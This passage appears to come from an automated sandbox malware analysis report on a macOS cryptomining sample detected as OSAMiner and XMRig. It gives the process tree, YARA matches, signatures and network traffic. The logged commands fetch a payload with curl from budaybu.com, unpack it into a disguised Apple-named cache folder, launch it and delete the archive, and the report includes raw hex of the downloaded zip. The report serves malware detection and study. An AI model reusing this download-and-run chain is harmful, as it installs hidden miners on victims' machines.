          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -i &> /dev/null & echo $!
            • sh New Fork (PID: 570, Parent: 569)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -i
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -m &> /dev/null & echo $!
            • sh New Fork (PID: 572, Parent: 571)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -m
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c caffeinate -s &> /dev/null & echo $!
            • sh New Fork (PID: 574, Parent: 573)
            • caffeinate (MD5: 56e8503a6220d4017ab8c2910f1fc950) Arguments: caffeinate -s
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c /usr/sbin/system_profiler SPHardwareDataType | awk '/Serial/ { print $NF }'
            • sh New Fork (PID: 577, Parent: 576)
            • system_profiler (MD5: 28bae8e36d2b8a65b50a54ee327298b8) Arguments: /usr/sbin/system_profiler SPHardwareDataType
            • sh New Fork (PID: 578, Parent: 576)
            • awk (MD5: fa9db7f6c4a0287ceb78a3bd34524ada) Arguments: awk /Serial/ { print $NF }
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c mkdir ~/library/Caches
          • mkdir (MD5: 135a3b94b3d9efccb4c8cd23ac404571) Arguments: mkdir /Users/henry/library/Caches
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c mkdir ~/library/Caches/com.apple.R0
          • mkdir (MD5: 135a3b94b3d9efccb4c8cd23ac404571) Arguments: mkdir /Users/henry/library/Caches/com.apple.R0
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c system_profiler SPHardwareDataType
          • system_profiler (MD5: 28bae8e36d2b8a65b50a54ee327298b8) Arguments: system_profiler SPHardwareDataType
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c [ -e ~/library/Caches/com.apple.R0/ssl4.plist ] && echo true || echo false
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c curl -L http://budaybu.com:8080/ssl.zip -o ~/library/Caches/com.apple.R0/ssl.zip
          • curl (MD5: 078cd73f58d3d8f875eed22522ff73f7) Arguments: curl -L http://budaybu.com:8080/ssl.zip -o /Users/henry/library/Caches/com.apple.R0/ssl.zip
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c /usr/bin/ditto -xk ~/library/Caches/com.apple.R0/ssl.zip ~/library/Caches/com.apple.R0
          • ditto (MD5: 5e90ed3b53d4ac63096f6727363249c5) Arguments: /usr/bin/ditto -xk /Users/henry/library/Caches/com.apple.R0/ssl.zip /Users/henry/library/Caches/com.apple.R0
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c rm ~/library/Caches/com.apple.R0/ssl.zip
          • rm (MD5: 11b6a6a1a3102d67ef723cadda365da7) Arguments: rm /Users/henry/library/Caches/com.apple.R0/ssl.zip
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c cd ~/library/Caches/com.apple.R0 ~/library/Caches/com.apple.R0/ssl4.plist &> /dev/null & exit
            • sh New Fork (PID: 596, Parent: 595)
            • ssl4.plist (MD5: deb6c97315615faa44a0ac07244e7570) Arguments: /Users/henry/library/Caches/com.apple.R0/ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
          • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c pgrep ssl4.plist
          • pgrep (MD5: 96a4d2f3aecec616f31f66589f196205) Arguments: pgrep ssl4.plist
      • sh (MD5: 8aa60b22a5d30418a002b340989384dc) Arguments: sh -c rm ~/Library/11.png
      • rm (MD5: 11b6a6a1a3102d67ef723cadda365da7) Arguments: rm /Users/henry/Library/11.png
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
gqnmir4HusJoeSecurity_OSAMinerYara detected OSAMinerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /Users/henry/Library/11.pngJoeSecurity_OSAMinerYara detected OSAMinerJoe Security
      /Users/henry/Library/Caches/com.apple.R0/config.txtJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        /Users/henry/Library/Caches/com.apple.R0/cpu.txtJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          /Users/henry/Library/Caches/com.apple.R0/pools.txtJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            /Users/henry/Library/Caches/com.apple.R0/.BC.T_brE6fGJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              Bitcoin Miner:

              barindex
              Yara detected OSAMinerShow sources
              Source: Yara matchFile source: gqnmir4Hus, type: SAMPLE
              Source: Yara matchFile source: /Users/henry/Library/11.png, type: DROPPED
              Yara detected Xmrig cryptocurrency minerShow sources
              Source: Yara matchFile source: /Users/henry/Library/Caches/com.apple.R0/config.txt, type: DROPPED
              Source: Yara matchFile source: /Users/henry/Library/Caches/com.apple.R0/cpu.txt, type: DROPPED
              Source: Yara matchFile source: /Users/henry/Library/Caches/com.apple.R0/pools.txt, type: DROPPED
              Source: Yara matchFile source: /Users/henry/Library/Caches/com.apple.R0/.BC.T_brE6fG, type: DROPPED
              Executes the "caffeinate" command used to prevent the system from disk/display/system sleeping indicative for minersShow sources
              Source: /bin/sh (PID: 568)Caffeinate executable: /usr/bin/caffeinate caffeinate -dJump to behavior
              Source: /bin/sh (PID: 570)Caffeinate executable: /usr/bin/caffeinate caffeinate -iJump to behavior
              Source: /bin/sh (PID: 572)Caffeinate executable: /usr/bin/caffeinate caffeinate -mJump to behavior
              Source: /bin/sh (PID: 574)Caffeinate executable: /usr/bin/caffeinate caffeinate -sJump to behavior
              Found strings related to Crypto-MiningShow sources
              Source: .BC.T_brE6fG.340.drString found in binary or memory: pools.txt
              Source: .BC.T_brE6fG.340.drString found in binary or memory: Cryptonight hash self-test NOT defined for POW %s
              Source: global trafficTCP traffic: 192.168.0.50:49243 -> 43.249.204.231:8080
              Source: global trafficTCP traffic: 192.168.0.50:49247 -> 185.134.22.134:14441
              Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.205
              Source: unknownTCP traffic detected without corresponding DNS query: 17.253.57.205
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-zip-compressedLast-Modified: Thu, 23 Jan 2020 07:29:43 GMTAccept-Ranges: bytesETag: "f0a08ee1bed1d51:0"Server: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Fri, 15 Jan 2021 10:00:49 GMTContent-Length: 1629446Data Raw: 50 4b 03 04 0a 00 00 00 00 00 68 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 08 00 10 00 6f 70 65 6e 73 73 6c 2f 55 58 0c 00 24 68 25 5e 24 68 25 5e f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 84 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 10 00 6f 70 65 6e 73 73 6c 2f 6c 69 62 2f 55 58 0c 00 58 68 25 5e 58 68 25 5e f5 01 14 00 50 4b 03 04 14 00 08 00 08 00 1d 85 34 50 00 00 00 00 00 00 00 00 00 00 00 00 21 00 10 00 6f 70 65 6e 73 73 6c 2f 6c 69 62 2f 6c 69 62 63 72 79 70 74 6f 2e 31 2e 30 2e 30 2e 64 79 6c 69 62 55 58 0c 00 9a 67 25 5e 9a 67 25 5e f5 01 14 00 ec bd 0b 7c 54 d5 b5 30 3e 93 4c 92 09 99 b0 07 89 18 35 40 d0 68 c1 a2 e6 38 68 a1 45 9b 03 33 72 06 67 20 15 10 ab 20 28 12 b1 02 49 21 11 ed 95 e7 24 9a dd e3 68 ea ab f4 5a af b4 b5 b7 f6 71 bf 8b da a6 88 15 67 02 e4 85 40 c2 23 84 57 12 de 13 02 4c 20 3c c2 2b f3 ad b5 f6 99 67 c2 43 7b ef f7 ff fd fe bf 06 66 ce 7e ae bd d6 da eb b5 f7 d9 e7 cc e6 0b c7 bb 92 74 3a 7d bc 4e a7 4b 84 4f 2a 7c 3c 90 28 d1 99 75 f8 77 33 7c 06 c7 e9 74 d3 a6 4d b4 3d 3e 51 d7 fd 6f c9 ad 3d e6 13 b4 4f a2 56 3c 6d 5a e1 cc 97 0a c3 cd ba c1 13 c3 e9 66 0d bf 29 94 37 45 c2 35 e8 96 44 66 a7 4d 9b 5f 58 f4 cc fc 2b c2 9b a5 08 38 89 f1 e1 bc 3e a2 bf 51 83 17 c6 0f e1 4d 9b 35 73 76 c1 cc 79 3d c0 2b 78 44 c0 bb 25 21 9c 8f bb 2a 7e 33 f2 e7 ce 2f 8c c8 47 c3 f3 e4 0a 78 d5 e3 e2 42 f9 44 dd 95 ff 00 de fc c2 79 cf cf 7d ee 0a f0 ca 3e bc 99 ae 07 ff a4 0f e5 0d 11 fd a3 70 a5 fe 45 73 17 3c 3f f7 d9 69 cf cf cd cb ef 01 5e e1 58 31 8f cb 87 86 f3 b1 30 22 ff 70 f4 6a 92 13 ab 3c 51 8e a8 08 ca 47 4b 5c 74 7e a5 c8 c7 6b 1f 63 08 af b9 b3 a7 cd 7f 79 ce 33 f9 b3 a7 15 14 ce bb 22 3c 63 44 3e 3e a2 1a 79 b8 34 8a ce e7 f2 0b a3 f2 d1 f0 8c 1a bc 15 11 f9 58 78 cb a2 fa cf 7e fa 6a f8 7d 1c c4 cf 10 ce 47 c2 03 5d d3 bd 17 05 6f 4e 3e 4e c2 f3 85 d3 f2 8a e6 ce e8 06 6f 65 71 34 bd 98 8f 84 97 ac 8b fe eb 2e 77 d1 f0 3c 1a bc e9 3f 8f 0b e5 0d ba 2b ff 4d 9b f6 ec d3 85 4f 47 e6 a3 e1 65 b2 01 74 35 df 1c ce 5f 1d de 33 f3 e7 47 e5 a3 e1 65 0f 16 f0 72 ee 0b 97 45 c2 8b d4 61 d1 7f 46 fe 9c 39 f9 73 af 04 af e0 09 01 2f 3b a2 4f 24 ff 62 e1 21 19 0a c1 71 d8 c7 3d 62 b3 da 83 3a 31 7d 80 96 d0 b4 34 5b e4 87 06 12 42 70 22 61 a1 1d 9d 0e 9f f4 60 b9 5e 4f 9f 9c 99 2f cd 9c 51 54 f8 f4 33 b3 67 4e 2b 78 ba 70 d6 bd f9 05 33 e7 ce 9f 3f fb de d9 cf 3f 83 9f 19 f3 5e 2e 28 cc bf 47 ba 27 1b fe 3d fb 32 94 e8 7a fc bb 0d 24 3f 5b c3 43 c9 04 9c 73 07 e8 5e 8a a8 f7 40 be 1a 84 a6 f4 c7 03 74 b3 de d6 93 ee 22 2e ed e6 4c 9d da 5f a7 bb 74 7c 90 2e 5b 8e d3 a5 40 59 ae d6 e7 b8 51 7c d2 d3 c0 76 43 9b 57 7b 1e 9a fe 56 b4 0e d2 dd 14 cb 3c f8 bb 55 1b e7 e7 23 d8 c4 5f 8f fe 7e bf 4f 7e d5 ff f9 27 fa 6e 74 65 e9 34 13 9f dc 4b a7 e
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.budaybu100001.com:8080User-Agent: curl/7.54.0Accept: */*
              Source: global trafficHTTP traffic detected: GET /budaybu.png HTTP/1.1Host: budaybu.com:8080User-Agent: curl/7.54.0Accept: */*
              Source: global trafficHTTP traffic detected: GET /ssl.zip HTTP/1.1Host: budaybu.com:8080User-Agent: curl/7.54.0Accept: */*
              Source: unknownDNS traffic detected: queries for: www.budaybu100001.com
              Source: /Users/henry/library/Caches/com.apple.R0/ssl4.plist (PID: 596)Reads from socket in process: dataJump to behavior
              Source: .BC.T_brE6fG.340.drString found in binary or memory: https://github.com/fireice-uk/cryptonote-speedup-demo
              Source: .BC.T_brE6fG.340.drString found in binary or memory: https://ryo-currency.com
              Source: /Users/henry/library/Caches/com.apple.R0/ssl4.plist (PID: 596)Writes from socket in process: dataJump to behavior